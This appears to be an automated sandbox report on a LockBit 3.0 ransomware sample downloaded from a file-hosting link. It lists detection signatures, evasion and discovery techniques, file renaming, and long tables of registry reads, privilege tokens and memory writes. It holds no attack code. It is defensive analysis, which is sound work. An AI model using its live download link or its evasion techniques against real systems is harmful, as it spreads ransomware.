Malware Analysis Report

2025-05-05 20:48

Sample ID 250417-vl71xaxps2
Target https://gofile.io/d/OVEE6R
Tags
lockbit defense_evasion discovery execution ransomware spyware stealer upx
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V16
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://gofile.io/d/OVEE6R was found to be: Known bad.

Malicious Activity Summary

lockbit defense_evasion discovery execution ransomware spyware stealer upx

Lockbit

Rule to detect Lockbit 3.0 ransomware Windows payload

Lockbit family

Renames multiple (656) files with added filename extension

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Executes dropped EXE

Reads user/profile data of web browsers

Drops desktop.ini file(s)

Indicator Removal: File Deletion

Legitimate hosting services abused for malware hosting/C2

UPX packed file

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Subvert Trust Controls: Mark-of-the-Web Bypass

System Location Discovery: System Language Discovery

Browser Information Discovery

Enumerates physical storage devices

Modifies data under HKEY_USERS

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

NTFS ADS

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-04-17 17:05

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-04-17 17:05

Reported

2025-04-17 17:07

Platform

win11-20250410-en

Max time kernel

74s

Max time network

88s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/OVEE6R

Signatures

Lockbit

ransomware lockbit

Lockbit family

lockbit

Rule to detect Lockbit 3.0 ransomware Windows payload

Description Indicator Process Target
N/A N/A N/A N/A

Renames multiple (656) files with added filename extension

ransomware

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\curl.exe N/A
N/A N/A C:\Windows\system32\curl.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$Recycle.Bin\S-1-5-21-2627618461-2240074273-3604016983-1000\desktop.ini C:\Users\Admin\Downloads\LB3.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-2627618461-2240074273-3604016983-1000\desktop.ini C:\Users\Admin\Downloads\LB3.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-2627618461-2240074273-3604016983-1000\desktop.ini C:\Users\Admin\Downloads\LB3.exe N/A

Indicator Removal: File Deletion

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A api.gofile.io N/A N/A
N/A api.gofile.io N/A N/A
N/A api.gofile.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\spool\PRINTERS\00002.SPL C:\Windows\splwow64.exe N/A
File created C:\Windows\system32\spool\PRINTERS\PPm701o5mcrl9yidh2ldcujt07.TMP C:\Windows\system32\printfilterpipelinesvc.exe N/A
File created C:\Windows\system32\spool\PRINTERS\PPfcxul87k_i2bawdma2f3h0apc.TMP C:\Windows\system32\printfilterpipelinesvc.exe N/A
File created C:\Windows\system32\spool\PRINTERS\PPf0f_blq7jjs5emau7gadpir_.TMP C:\Windows\system32\printfilterpipelinesvc.exe N/A
File created C:\Windows\system32\spool\PRINTERS\00003.SPL C:\Windows\splwow64.exe N/A
File created C:\Windows\system32\spool\PRINTERS\PP3husm526qa5cns6a7bqtg2mr.TMP C:\Windows\system32\printfilterpipelinesvc.exe N/A
File created C:\Windows\system32\spool\PRINTERS\PP30p004bpqaqxjo403w2f08tr.TMP C:\Windows\system32\printfilterpipelinesvc.exe N/A
File created C:\Windows\system32\spool\PRINTERS\PP6jqdeqy3uqwqmv3fa6g4mj87c.TMP C:\Windows\system32\printfilterpipelinesvc.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\ProgramData\1336.tmp N/A
N/A N/A C:\ProgramData\BDCE.tmp N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1128_1449343746\_metadata\verified_contents.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1128_1449343746\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1128_1449343746\LICENSE C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1128_1449343746\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1128_1449343746\sets.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Subvert Trust Controls: Mark-of-the-Web Bypass

defense_evasion
Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\LB3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\1336.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\LB3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\BDCE.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133893831615051936" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2627618461-2240074273-3604016983-1000\{4DFF0642-E14C-4F33-BD66-A484B647F6D4} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: 36 N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: 33 N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1128 wrote to memory of 5304 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 5304 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4240 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4240 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4240 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4240 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4240 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4240 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4240 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4240 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
